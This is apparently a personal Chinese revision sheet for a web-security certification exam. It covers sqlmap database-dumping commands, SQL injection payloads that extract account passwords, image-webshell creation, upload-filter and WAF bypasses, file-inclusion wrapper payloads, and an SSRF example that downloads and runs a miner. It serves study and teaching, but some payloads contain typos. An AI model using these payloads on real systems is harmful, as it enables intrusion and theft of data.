CISAW-Web基础级考证——考前复习知识点大杂烩

---

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

---

 

       明天要考CISAW-Web安全基础级证书，复习整理一下思路，明天考试

目录

sql注入时，使用sqlmap注入mysql和access数据库有什么不同

sql注入

命令执行：    

xss:

csrf

xxe

ssrf

代码审计：

php基本功：

python：

---

sql注入时，使用sqlmap注入mysql和access数据库有什么不同

三个给分点：
1.命令
mysql:

sqlmap   -u   url   --dbs

sqlmap   -u   url   -D   数据库名   --tables

sqlmap   -u   url   -D   数据库名   -T  表名   --columns

sqlmap   -u   url   -D   数据库名   -T  表名   -C 字段名   --dump

2. access:

sqlmap -u   url   --tables

sqlmap -u   url   --columns   -T 表名

sqlmap -u   url   -T  表名      -C 字段名    --dump

3. 说出sqlmap为什么注入access没有dbs

Access 每个数据就是个单独文件，每个Access 只有表结构

图片马的制作：
写出命令即可

/a	ASCIl文本文件(默认
/b	二进制文件复制——将复制扩展字符

windows

copy 1.jpg /b + 2.php /a  hack.jpg

linux           

cp 1.jpg /b + 2.php /a hack.jpg

 

sql注入

1.union

# 判断是否存在注入
?id=1'

# 判断该注入点的长度是多少
?id=1' order by * --+

# 确认长度为*后(长度为3)，获取系统信息（分别使用 user（）、database（）、version（），来进行查询）
?id=1' union select 1,2,version() --+

# 爆表
?id=1' union select 1,2,table_name from information_schema.tables
where table_schema='数据库名' limit 0,1 --+

# 爆字段
id=1' union select 1,2,table_column from information_schema.columns 
where table_schema='数据库名' and table_name='表名' limit 0,1 --+

# 爆账号和密码
?id=1' union select 1,username,password from users limit 0,1 --+

 

• Booleanbase（普通盲注）

• Timebase（时间盲注）

• Errorbase（基于报错的盲注）。

至于具体分别，我们在后面的试验中会学习到。 首先我们要知道在盲注中经常用到的一些方式：

 

• left（database（），1） 返回 database（）的最左面 1 个字符

• length（databse（）） 返回数据库的长度

• substr（a，b，c） 从 b 位置开始，截取字符串 a 的 c 长度

• ascii（） 将某个字符转换为 ascii 值

• mid（a,b,c）从位置 b 开始，截取 a 字符串的 c 位

# 盲注猜解系统版本号左边开头信息
?id=1' and left(version(),1)=5 --+

# 盲注猜解系统版本长度
?id=1' and length(version())=* --+

# 盲注猜解数据库版本信息内容
?id=1' and left(version,1) > '*'  --+

# 盲注猜解数据库的表的名称
?id=1' and ascii(substr((select table_name from information_schema.
tables where table_shcema=database() limit 0,1),1,1)) > 100 --+

# 盲注猜解数据库表的列名
id=1' and ascii(substr((select table_column from information_schema
columns where table_shcema='数据库名' and table_name='表名'
limit 0,1),1,1)) > 99 --+

# 盲注猜解列名的内容
# 0x20 可以作为整型常量和单字节表示，在这里作为单字节表示，可用于字符型变量的赋值，用于char时，其代表ascii码值0x20，即字符空格''
?id=1' and 1=(select ifnull(cast(username as char),0x20) from 
数据库名.表名 order by id limi 0,1),1,)) = 68 --+

# 判断数据库
?id=1' and 1=(select 1 from information_schema.columns where
table_name='表名' and column_name regexp '^username' limit  0,1) > 97 --+

    2.bool

# 判断，同理表名字，段名
?id=1' and length(version())=8 --+
# 爆库名
?id=1' and left((select database()),8)='security'--+
# 爆表，爆字段，爆值

    3.报错(extractvalue()函数 / updatexml()函数 / floor()函数)

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数，分别是ExtractValue()和UpdateXML()

注：updatexml注入

首先了解下updatexml()函数

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc

第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。

第三个参数：new_value，String格式，替换查找到的符合条件的数据

作用：改变文档中符合条件的节点的值

    4.time(sleep() / benchmark)

# 判断是否存在延时注入
?id=1' and sleep(3) --+
# 判断数据库长度是否为4，如果为真则延时3秒加载也没，为false则返回1
?id=1' and  if(length(database())=4,sleep(3),1) --+
# 猜解数据库名称
?id=1' and   if(left(database(),1)='d',sleep(3),1)--+
# 猜解表名
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+
# 猜解密码字段
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+
# 猜解账号字段
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 9,1),8)='username', sleep(3), 1) --+
# 猜解密码字段内容
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' , sleep(3), 1) --+
# 猜解账号字段内容
?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' , sleep(3), 1) --+

数据库
    1.mysql(information_schema)
    2.mssql(注入靠比大小)
    3.access(没有库结构，只有表列)
    

注入点：
    1.int
    2.string

文件上传：
    1. 木马
   大马/小马
    •  大马(功能多，代码量大)
    •  小马(功能单一，一行解决)

什么情况下用小马？什么情况下用大马？什么时候用过狗马？

    •  过狗小马：冰蝎小马

    • 过狗大马：过狗大马

答：遇到安全狗，直接上大马。原因是菜刀流量特征明显，而大马是正常文件正常访问。小马需要菜刀连接，而大马不需要

    2.上传点
    • 头像

    • 文件管理

    • 附件管理

    3.上传绕过
    前端验证
        禁用js
    类型检测
        mime
    后缀名检测
        各种截断
    头检测
       冰蝎图片木马
    图片二次渲染
        上传普通图片，判断渲染前和渲染后不变的位置
 文件包含
     远程文件包含(allow_url_include)
        包含http路径，引入webshell
    本地文件
        包含本地敏感文件(/etc/passwd，config.ini)
    伪协议
        php://input     输入/输出流

               php://input

        php://filter      PHP 归档

?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php

        file://              访问本地文件系统

                file://etc/passwd

        phar://            PHP 归档(php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压)

用法：?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 

        zip://             跟phar 类似，但用法不太一样

?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php

命令执行：
    

       危险函数(exec/system/shell_exec/popen/passthru)
代码执行:
    危险函数(eval/assert/preg_replace /e参数)
反序列化:
    原理：
        构造函数__construct
        析构函数__distruct
        __sleep
        __weekup
        定义的类中的方法在serialize/unserialize时候引用方法，导致(变量覆盖，传入恶意代码)进而危害系统安全

xss:

xss本质是恶意的js代码插入到前端页面中执行
    类型：
        1.反射型
            危害小，一次性，常用作钓鱼
        2.存储型
            危害大，持久型(常常存在数据库中)，常用来打cookie或截图，getshell
        3.dom型
            新型xss，通常认为是反射型，出现在各种事件处，最新研究可以是持久型

csrf

 通常和xss连用，不获取cookie，而是通过诱导点击/ajax伪造发包等方式发起伪造请求

xxe

 xml外部实体注入，可以引入外部实体实现读取本地敏感文件

ssrf

  服务器端请求伪造
        文件包含(include url)
        命令执行(wget url)
    危害：
        可以控制服务器扫描内网
        可以控制服务器下载挖矿(wget http://xxxxx/qwer;chmod a+x qwer;./qwer)

代码审计：

思路：
        1.危险函数里边的可控变量
        2.外部接受的变量传递流程
        3.单个模块功能审计

php基本功：

      函数(过滤，执行，string调整，匹配对比)

python：

    变量
    四则运算
    逻辑控制(if else)
    循环(for while)
    函数
    库(丰富的库，requests/bs4/urllib2，os/sys，xls，math，iso)

---

我不需要自由，只想背着她的梦

一步步向前走，她给的永远不重

---